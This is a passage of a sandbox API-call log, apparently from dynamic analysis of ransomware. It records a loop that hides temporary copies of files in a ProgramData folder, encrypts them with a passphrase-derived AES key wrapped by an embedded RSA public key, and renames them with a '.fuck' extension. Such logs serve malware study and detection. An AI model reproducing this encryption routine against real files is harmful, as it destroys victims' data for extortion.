0x5 [0238.262] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0238.262] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x27eac90 [0238.277] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.277] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.278] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0238.278] GetLastError () returned 0x5 [0238.278] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag")) returned 0x20 [0238.279] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", dwFileAttributes=0x80) returned 0 [0238.279] CreateFileA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.280] CreateFileA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.gsg" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.280] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.gsg", dwFileAttributes=0x2) returned 0 [0238.280] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x285bce0) returned 1 [0238.282] CryptCreateHash (in: hProv=0x285bce0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0238.282] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.282] CryptHashData (hHash=0x27eaa10, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.282] CryptDeriveKey (in: hProv=0x285bce0, Algid=0x6610, hBaseData=0x27eaa10, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x27eaf50) returned 1 [0238.282] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.282] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0238.282] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x285bc58) returned 1 [0238.283] CryptImportPublicKeyInfo (in: hCryptProv=0x285bc58, dwCertEncodingType=0x1, pInfo=0x286b9b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286b9e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286b9f0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27ea810) returned 1 [0238.283] CryptEncrypt (in: hKey=0x27ea810, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0238.283] CryptEncrypt (in: hKey=0x27ea810, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285b0a8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x285b0a8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0238.283] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285b0a8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0238.283] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0238.283] CryptEncrypt (in: hKey=0x27eaf50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0238.283] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0238.283] CloseHandle (hObject=0xffffffff) returned 1 [0238.283] CloseHandle (hObject=0xffffffff) returned 1 [0238.283] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.gsg" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag.gsg"), lpNewFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag"), bFailIfExists=0) returned 0 [0238.284] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", dwFileAttributes=0x0) returned 0 [0238.284] DeleteFileA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.gsg" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag.gsg")) returned 0 [0238.284] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag"), lpNewFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.fuck" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run extensibility component.swidtag.fuck")) returned 0 [0238.284] CryptDestroyHash (hHash=0x27eaa10) returned 1 [0238.284] CryptDestroyKey (hKey=0x27eaf50) returned 1 [0238.284] CryptReleaseContext (hProv=0x285bce0, dwFlags=0x0) returned 1 [0238.284] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.284] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0238.284] GetLastError () returned 0x5 [0238.285] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag")) returned 0x20 [0238.285] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", dwFileAttributes=0x80) returned 0 [0238.285] CreateFileA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.285] CreateFileA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.gsg" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.285] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.gsg", dwFileAttributes=0x2) returned 0 [0238.285] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x285b350) returned 1 [0238.287] CryptCreateHash (in: hProv=0x285b350, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0238.287] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.287] CryptHashData (hHash=0x27ead50, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.287] CryptDeriveKey (in: hProv=0x285b350, Algid=0x6610, hBaseData=0x27ead50, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x27ead90) returned 1 [0238.287] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.287] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0238.287] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2858160) returned 1 [0238.288] CryptImportPublicKeyInfo (in: hCryptProv=0x2858160, dwCertEncodingType=0x1, pInfo=0x286acb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286ace8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286acf0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27eaf50) returned 1 [0238.288] CryptEncrypt (in: hKey=0x27eaf50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0238.288] CryptEncrypt (in: hKey=0x27eaf50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285a9c0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x285a9c0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0238.288] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285a9c0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0238.288] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28839d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x28839d0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0238.288] CryptEncrypt (in: hKey=0x27ead90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28839d0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x28839d0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0238.288] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28839d0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0238.288] CloseHandle (hObject=0xffffffff) returned 1 [0238.288] CloseHandle (hObject=0xffffffff) returned 1 [0238.288] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.gsg" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag.gsg"), lpNewFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag"), bFailIfExists=0) returned 0 [0238.289] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", dwFileAttributes=0x0) returned 0 [0238.289] DeleteFileA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.gsg" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag.gsg")) returned 0 [0238.289] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag"), lpNewFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.fuck" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run licensing component.swidtag.fuck")) returned 0 [0238.290] CryptDestroyHash (hHash=0x27ead50) returned 1 [0238.290] CryptDestroyKey (hKey=0x27ead90) returned 1 [0238.290] CryptReleaseContext (hProv=0x285b350, dwFlags=0x0) returned 1 [0238.290] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.290] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0238.290] GetLastError () returned 0x5 [0238.290] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag")) returned 0x20 [0238.291] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", dwFileAttributes=0x80) returned 0 [0238.291] CreateFileA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.291] CreateFileA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.gsg" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.291] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.gsg", dwFileAttributes=0x2) returned 0 [0238.291] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x285ba38) returned 1 [0238.294] CryptCreateHash (in: hProv=0x285ba38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0238.294] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.294] CryptHashData (hHash=0x27eaa10, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.294] CryptDeriveKey (in: hProv=0x285ba38, Algid=0x6610, hBaseData=0x27eaa10, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x27eacd0) returned 1 [0238.294] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.294] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0238.294] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x285bce0) returned 1 [0238.294] CryptImportPublicKeyInfo (in: hCryptProv=0x285bce0, dwCertEncodingType=0x1, pInfo=0x286b338*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286b368*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286b370*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27ead90) returned 1 [0238.294] CryptEncrypt (in: hKey=0x27ead90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0238.294] CryptEncrypt (in: hKey=0x27ead90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285b1b8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x285b1b8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0238.295] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285b1b8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0238.295] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28839d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x28839d0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0238.295] CryptEncrypt (in: hKey=0x27eacd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28839d0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x28839d0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0238.295] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28839d0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0238.295] CloseHandle (hObject=0xffffffff) returned 1 [0238.295] CloseHandle (hObject=0xffffffff) returned 1 [0238.295] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.gsg" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag.gsg"), lpNewFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag"), bFailIfExists=0) returned 0 [0238.295] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", dwFileAttributes=0x0) returned 0 [0238.295] DeleteFileA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.gsg" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag.gsg")) returned 0 [0238.296] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag"), lpNewFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.fuck" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft office 16 click-to-run localization component.swidtag.fuck")) returned 0 [0238.296] CryptDestroyHash (hHash=0x27eaa10) returned 1 [0238.296] CryptDestroyKey (hKey=0x27eacd0) returned 1 [0238.296] CryptReleaseContext (hProv=0x285ba38, dwFlags=0x0) returned 1 [0238.296] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.296] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0238.296] GetLastError () returned 0x5 [0238.296] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag")) returned 0x20 [0238.297] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", dwFileAttributes=0x80) returned 0 [0238.297] CreateFileA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.297] CreateFileA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.gsg" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.297] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.gsg", dwFileAttributes=0x2) returned 0 [0238.297] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x285ba38) returned 1 [0238.299] CryptCreateHash (in: hProv=0x285ba38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0238.299] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.299] CryptHashData (hHash=0x27ea8d0, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.299] CryptDeriveKey (in: hProv=0x285ba38, Algid=0x6610, hBaseData=0x27ea8d0, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x27eacd0) returned 1 [0238.300] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.300] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0238.300] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 